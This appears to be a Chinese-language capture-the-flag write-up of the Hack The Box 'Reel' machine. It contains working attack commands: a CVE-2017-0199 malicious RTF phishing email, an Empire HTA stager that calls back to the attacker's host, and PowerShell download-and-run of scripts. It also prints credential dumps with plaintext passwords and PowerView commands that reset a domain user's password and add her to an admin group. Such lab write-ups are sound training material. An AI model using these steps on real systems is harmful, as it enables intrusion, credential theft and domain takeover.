Reel

靶机地址:
https://www.hackthebox.eu/home/machines/profile/143
nmap -v -A -sV -sC 10.10.10.77
这是一台server2012 R2,有ssh、ftp、smtp服务,Active Directory域服务。
扫描出来的信息里面,可以看到ftp匿名登陆。

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP, 
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?
Host script results:
|_clock-skew: mean: -47s, deviation: 2s, median: -49s
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2019-01-21T03:35:22+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-01-21 11:35:20
|_  start_date: 2019-01-21 07:54:45

使用ftp匿名登陆,然后mget *下载里面的内容,一共三个文件AppLocker.docx、readme.txt、Forwarding.docx

$ ftp
ftp> open
(to) 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:Rogerd): Anonymous 
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
ftp> cd documents
250 CWD command successful.
ftp> mget *
mget AppLocker.docx? 
200 PORT command successful.

cat readme.txt
让我们构造一个rtf的邮件。
那我们还要找到一个邮件地址。

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.%

查看其他两个word文档,其中一个无法直接打开,我们查看一些相关信息。
可以看到一个邮箱
exiftool Windows\ Event\ Forwarding.docx

ExifTool Version Number         : 11.16
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 14 kB
File Modification Date/Time     : 2019:01:21 12:01:36+08:00
File Access Date/Time           : 2019:01:21 13:00:24+08:00
File Inode Change Date/Time     : 2019:01:21 12:01:36+08:00
File Permissions                : rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : [email protected]

打开AppLocker.docx
已启用,哈希规则对可执行文件,MSI和脚本(.ps1,.vbs,.cmd,.bat)有效

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

我们 尝试发送给[email protected] ,并监听一个端口看是否有返回信息。
我们使用Exploit toolkit CVE-2017-0199 Microsoft Office RCE。它可以生成恶意RTF / PPSX文件
https://github.com/bhdresh/CVE-2017-0199
使用python监听

python -m SimpleHTTPServer 8000

使用python脚本CVE-2017-0199生成RTF,发送到指定邮箱

python cve-2017-0199_toolkit.py -M gen -t RTF -w TEST.RTF -u http://10.10.14.19:8000/reel.hta

使用sendEmail发送邮件

sendEmail -f [email protected] -t [email protected] -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77

可以看到成功访问到8000端口

Empire是一个用于管理powershell会话的工具
我们使用Empire生成hta,然后通过发送到指定邮箱,使用python运行服务,把hta放在tmp文件下,接收方执行TEST.RTF就会远程访问我们提前生成好放在tmp文件夹下的hta文件。

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://10.10.10.14.19
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

(Empire: listeners/http) > back
(Empire: listeners) > usestager windows/hta
(Empire: stager/windows/hta) > set Listener http
(Empire: stager/windows/hta) > set OutFile /home/Rogerd/tools/CVE-2017-0199/reel.hta
(Empire: stager/windows/hta) > generate

[*] Stager output written out to: /home/Rogerd/tools/CVE-2017-0199/reel.hta

我们把reel.hta移动到tmp目录
然后启动python -m SimpleHTTPServer 8000
在使用sendEmail -f [email protected] -t [email protected] -u RTF -m 'open file!' -a TEST.RTF -s 10.10.10.77

我们已经拿到回弹回来的shell了
通过查看桌面发现几个文件,user.txt是第一个flag

(Empire: stager/windows/hta) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 G25L3MWT ps 10.10.10.77     REEL              HTB\nico                powershell         2468   5/0.0    2019-01-23 11:49:22

(Empire: agents) > interact G25L3MWT

查看cred.xml文件,这是一个powershell 远程管理的密码凭据

(Empire: G25L3MWT) > shell Get-Content cred.xml
[*] Tasked G25L3MWT to run TASK_SHELL
[*] Agent G25L3MWT tasked with task ID 19
(Empire: G25L3MWT) > [*] Agent G25L3MWT returned results.
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

..Command execution completed.

通过这个cred.xml文件,我们查看tom的账户信息。

我们可以使用allchecks , 列举一些信息。我们可以看到nico的ssh服务的账号密码

(Empire: 7H9GMEV2) > usemodule privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked 7H9GMEV2 to run TASK_CMD_JOB
[*] Agent 7H9GMEV2 tasked with task ID 26
[*] Tasked agent 7H9GMEV2 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > [*] Agent 7H9GMEV2 returned results.
Job started: 64FXBN
[*] Valid results returned by 10.10.10.77
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...

ServiceName    : ssh-agent
Path           : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart     : False

ServiceName    : ssh-agent
Path           : C:\Program Files\OpenSSH\ssh-agent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'ssh-agent' -Path <HijackPath>
CanRestart     : False

ServiceName    : sshd
Path           : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : NT SERVICE\SSHD
AbuseFunction  : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart     : False

ServiceName    : sshd
Path           : C:\Program Files\OpenSSH\sshd.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : NT SERVICE\SSHD
AbuseFunction  : Write-ServiceBinary -Name 'sshd' -Path <HijackPath>
CanRestart     : False

DefaultDomainName    : HTB
DefaultUserName      : nico
DefaultPassword      : 4dri@na2017!**
AltDefaultDomainName : 
AltDefaultUserName   : 
AltDefaultPassword   : 

[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml

我们通过ssh访问tom
ssh [email protected]
1ts-mag1c!!!

在tom->Desktop->AD Audit->note.txt
大概的内容是提示我们找一个最短的攻击路径。

Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.

我们在tom->Desktop->AD Audit->BloodHound,我们查了一下资料了解到:
BloodHound使用图论来揭示Active Directory环境中隐藏的和通常无意的关系。攻击可以使用BloodHound轻松识别高度复杂的攻击路径,否则无法快速识别。防御者可以使用BloodHound来识别和消除那些相同的攻击路径。蓝队和红队都可以使用BloodHound轻松深入了解Active Directory环境中的权限关系。
安装BloodHound:
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/

我们通过登陆tom
SharpHound.ps1替换这个文件(在这之前我们要把下载好的BloodHound->Ingestors->SharpHound.ps1放入8000web目录下。)
powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/SharpHound.ps1','SharpHound.ps1')"

我们使用SharpHound.ps1生成一个报告并且下载下来
powershell -exec bypass
Import-Module ./SharpHound.ps1
invoke-bloodhound all

我们把生成好的报告下载下来,然后拖入BloodHound
scp -P 22 [email protected]:"\"/C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/20190124161418_BloodHound.zip\"" /tmp/
我们可以看到一共有18个用户,61个组

可以查看不同用户组的信息,我们查看backup_admin
我们通过搜索[email protected]
设置set as starting Node 为tom
设置set as ending node 为backup_admin
可以看到,我们可以通过CLAIRE去访问backup_admin,然后tom拥有CLAIRE

我们可以右键WriteOwner打开hepl->info查看详细的信息
tom可以修改claire所有者、claire拥有backup_admin的写权限。

The user [email protected] has the ability to modify the owner of the user [email protected]. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

我们可以先拿到claire再去拿backup_admin
这里提供了一个思路,通过PowerView更改所有权

我们可以参考powerview里面的文档进行配置
Set-DomainObjectOwner可以设置对象所有者的配置
Add-DomainObjectAcl可以写入DACL的配置
Set-DomainUserPassword可以使用重置用户密码的功能

1、选择Tom为Claire对象的所有者
2、允许Tom重置Claire密码。
3、修改密码

powershell -command "import-module .\PowerView.ps1; Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose; $pass=ConvertTo-SecureString "AbC!@#123" -AsPlainText -Force; Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose"


我们参考攻击路径,把Claire放入Backup_admin组。
目录下没有powerview.ps1 ,我们从kali下载下来

powershell "IEX (New-Object Net.Webclient).DownloadFile('http://10.10.14.19:8000/PowerView.ps1','PowerView.ps1')"

powershell -command "import-module .\PowerView.ps1; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity claire -Rights All -Verbose; Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Verbose"


这时候我们可以访问Administrator->Backup_Script文件夹了。
但是还是不能查看root.txt
这时候我们看到Backup_Script目录下有几个脚本,其中Backup_Script.ps1是一个备份脚本,可以拿到关键信息。

参考:
https://www.anquanke.com/post/id/85695
https://www.knowsec.net/archives/238/
https://www.harmj0y.net/blog/powershell/make-powerview-great-again/
https://github.com/ama21n/powershell/blob/master/PowerView.ps1

源链接

Hacking more

...